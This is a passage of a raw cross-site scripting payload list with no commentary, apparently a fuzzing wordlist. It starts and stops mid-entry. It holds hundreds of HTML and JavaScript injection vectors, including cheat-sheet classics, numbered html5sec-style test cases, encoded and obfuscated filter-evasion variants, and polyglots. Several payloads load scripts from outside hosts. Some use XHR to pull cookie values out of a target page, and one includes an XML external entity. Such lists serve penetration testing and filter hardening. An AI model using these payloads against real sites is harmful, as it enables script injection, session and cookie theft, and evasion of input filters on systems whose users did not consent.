eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> +<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> +<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E +<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> +<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E +<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> +<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> +<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? +<var onmouseover="prompt(1)">On Mouse Over</var>? +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=``<div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script ? +<img src ?itworksonchrome?\/onerror = alert(1)??? +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +"><img src=x onerror=prompt(1);> +<SCRIPT>alert('XSS');</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> +<IMG SRC="javascript:alert('XSS')" +<SCRIPT>a=/XSS/ +\";alert('XSS');// +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="mocha:[code]"> +<IMG SRC="livescript:[code]"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<XSS STYLE='no\xss:noxss("*//*"); +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +getURL("javascript:alert('XSS')") +a="get"; +<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> +<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> +<HTML><BODY> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)'; +<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<svg%0Aonload=%09((pro\u006dpt))()// +<sCriPt x>(((confirm)))``</scRipt x> +<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z +<deTAiLs/open/oNtoGGle=confirm()> +<scRiPt y="><">/*<sCRipt* */prompt()</script +<A href="javascript%26colon;confirm()">click +<sVg oNloaD=write()> +<A href=javas%26#99;ript:alert(1)>click +<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)> +<svG/x=">"/oNloaD=confirm()// +<--`<iMG/srC=` onerror=confirm``> --!> +<SVg </onlOad ="1> (_=prompt,_(1)) ""> +<!--><scRipT src=//14.rs> +<sCriPt/src=//14.rs? +<sCRIpt x=">" src=//15.rs></script> +<D3/OnMouSEenTer=[2].find(confirm)>z +<D3"<"/OncLick="1>[confirm``]"<">z +<D3/OnpOinTeReENter=confirm``>click here +<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> +<Z oncut=alert()>x +<iFrAMe/src \/\/onload = prompt(1) +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> +>>> vectors() +<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div> +<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div> +<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div> +<div id="39"><!-- up to Opera 11.52, FF 3.6.28 --> +<![><img src="]><img src=x onerror=alert(39)//"> +<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> +<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div> +<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div> +<div id="41"><li style=list-style:url() onerror=alert(41)></li> +<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div> +<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div> +<div id="43"><?xml version="1.0" standalone="no"?> +<html xmlns="http://www.w3.org/1999/xhtml"> +<head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head> +<body>Hello</body> +</html>//["'`-->]]>]</div> +<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div> +<div id="53"><xml id="xss" src="test.htc"></xml> +<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div> +<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div> +<div id="61"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div> +<div id="62"><!-- IE 6-8 --> +<x '="foo"><x foo='><img src=x onerror=alert(62)//'> +<!-- IE 6-9 --> +<! '="foo"><x foo='><img src=x onerror=alert(2)//'> +<? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div> +<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF +<img src="javascript:alert(2)"> +<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ +<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div> +<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div> +<div id="66"><?xml version="1.0"?> +<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> +<root/>//["'`-->]]>]</div> +<div id="67"><!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"onerror CDATA "alert(67)"onload CDATA "alert(2)">]><img />//["'`-->]]>]</div> +<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc>//["'`-->]]>]</div> +<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div> +<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div> +<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div> +<div id="87"><svg xmlns="http://www.w3.org/2000/svg"> +<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a> +</svg>//["'`-->]]>]</div> +<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> +<animation xlink:href="javascript:alert(88)"/> +<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> +<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> +<foreignObject xlink:href="javascript:alert(88)"/> +<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/> +</svg>//["'`-->]]>]</div> +<div id="89"><svg xmlns="http://www.w3.org/2000/svg"> +<set attributeName="onmouseover" to="alert(89)"/> +<animate attributeName="onunload" to="alert(89)"/> +</svg>//["'`-->]]>]</div> +<div id="90"><!-- Up to Opera 10.63 --> +<div style=content:url(test2.svg)></div> +<!-- Up to Opera 11.64 - see link below --> +<!-- Up to Opera 12.x --> +<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div> +<div id="91">[A] +<? foo="><script>alert(91)</script>"> 